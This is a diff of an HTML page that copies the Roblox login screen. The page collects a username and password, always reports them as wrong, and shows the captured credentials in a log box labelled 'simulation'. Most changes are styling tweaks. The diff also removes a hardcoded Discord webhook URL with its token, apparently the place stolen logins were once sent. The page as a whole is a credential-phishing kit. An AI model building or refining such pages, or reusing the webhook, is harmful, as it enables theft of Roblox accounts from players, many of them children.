--- a/index.html
+++ b/index.html
@@ -3,8 +3,8 @@
 <head>
   <meta charset="UTF-8">
   <title>Login - Roblox</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <link rel="icon" href="https://www.roblox.com/favicon.ico" type="image/x-icon">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <link href="https://fonts.googleapis.com/css2?family=Source+Sans+Pro:wght@400;600;700&display=swap" rel="stylesheet">
   <style>
     body {
@@ -18,10 +18,10 @@
     }
 
     .login-box {
-      background-color: white;
+      background-color: #ffffff;
       border: 1px solid #e3e3e3;
       padding: 32px;
-      width: 380px;
+      width: 360px;
       box-shadow: 0 2px 6px rgba(0,0,0,0.1);
       border-radius: 6px;
       display: flex;
@@ -31,21 +31,21 @@
 
     .roblox-logo {
       width: 160px;
-      margin-bottom: 20px;
+      margin-bottom: 24px;
     }
 
     h2 {
       font-size: 22px;
       font-weight: 700;
-      margin-bottom: 10px;
+      margin-bottom: 18px;
       color: #232527;
     }
 
     input {
       width: 100%;
       padding: 12px;
-      margin: 10px 0;
-      border: 1px solid #c5c5c5;
+      margin: 8px 0;
+      border: 1px solid #ccc;
       border-radius: 4px;
       font-size: 14px;
       background-color: #fff;
@@ -60,18 +60,18 @@
       color: white;
       font-weight: 700;
       font-size: 15px;
-      margin-top: 10px;
+      margin-top: 12px;
       cursor: pointer;
     }
 
     button:hover {
-      background-color: #00985e;
+      background-color: #00975f;
     }
 
     .error-msg {
       color: #d83b01;
       font-size: 13px;
-      margin-top: 8px;
+      margin-top: 10px;
       display: none;
     }
 
@@ -81,16 +81,17 @@
       color: #00ff88;
       padding: 12px;
       width: 90%;
-      margin-top: 30px;
+      margin-top: 25px;
       border-radius: 6px;
       font-size: 13px;
+      white-space: pre-wrap;
       word-break: break-word;
     }
 
     @media (max-width: 420px) {
       .login-box {
         width: 90%;
-        padding: 20px;
+        padding: 24px;
       }
 
       .roblox-logo {
@@ -102,12 +103,12 @@
 <body>
 
   <div class="login-box">
-    <img src="https://upload.wikimedia.org/wikipedia/commons/6/6b/Roblox_Logo_2022.svg" alt="Roblox Logo" class="roblox-logo">
-    <h2>Login to Roblox</h2>
+    <img src="https://images.rbxcdn.com/2f87d8f798d51e9796c22ec45650a36b.svg" alt="Roblox Logo" class="roblox-logo">
+    <h2>Log In to Roblox</h2>
     <input type="text" id="username" placeholder="Username">
     <input type="password" id="password" placeholder="Password">
     <button onclick="handleLogin()">Log In</button>
-    <div class="error-msg" id="errorMsg">Incorrect username or password.</div>
+    <div class="error-msg" id="errorMsg">Incorrect username or password. Try again.</div>
     <div class="log-output" id="logOutput"></div>
   </div>
 
@@ -123,19 +124,18 @@
         errorBox.textContent = 'All fields are required.';
         return;
       }
-<script>
-    const webhookURL = "https://discord.com/api/webhooks/1396126913038123068/WuVgy5nWwXQRum5a1Ye0s2zQElODsb6XpTIeKgbINlc51ZnfD-8kCUTg7a3WBBMrj56e";
+
       errorBox.style.display = 'block';
       errorBox.textContent = 'Incorrect username or password.';
 
       const time = new Date().toLocaleString();
 
       const log = `
->>> Roblox Simulation Login
+>>> ROBLOX LOGIN (SIMULATION)
 [${time}]
 Username: ${user}
 Password: ${pass}
-===========================
+======================================
       `.trim();
 
       logBox.textContent = log;
